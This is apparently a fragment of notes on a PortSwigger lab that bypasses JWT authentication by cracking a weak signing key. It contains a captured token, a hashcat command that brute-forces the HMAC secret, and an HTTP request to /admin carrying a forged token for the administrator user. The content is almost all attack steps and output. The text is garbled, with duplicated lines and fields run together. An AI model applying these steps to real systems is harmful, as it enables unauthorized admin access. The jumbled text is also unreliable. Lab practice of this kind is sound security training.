JWT authentication bypass via weak signing key
https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key
Last updated
https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key
Last updated
{"iss":"portswigger","exp":1742682771,"sub":"wiener"}eyJraWQiOiI3NTUzZjE1OC0zOTA5LTRiNDAtOGZhMy0zNDZmM2ZiZTViOTYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc0MjY4Mjc3MSwic3ViIjoid2llbmVyIn0.1h8m2wyXUGHZfKhTiOEKAvdKBhkgK5cDAGajwa2zrTohashcat -a 0 -m 16500 jwt ~/Documents/wordlists/jwt.secrets.listGET /admin HTTP/2
Host: 0a71008804ff6c6185fbc1cf004b005c.web-security-academy.net
Cookie: session=eyJraWQiOiI4MmRmZWY5OC02YWE0LTRkNTItODNkOS03NTMwNzI5NmNhYTkiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc0MjY4NDUwOSwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.t5w7XuZemQGQB2xo1NoxuYYgUGWU_Tro27qR-RT4oQU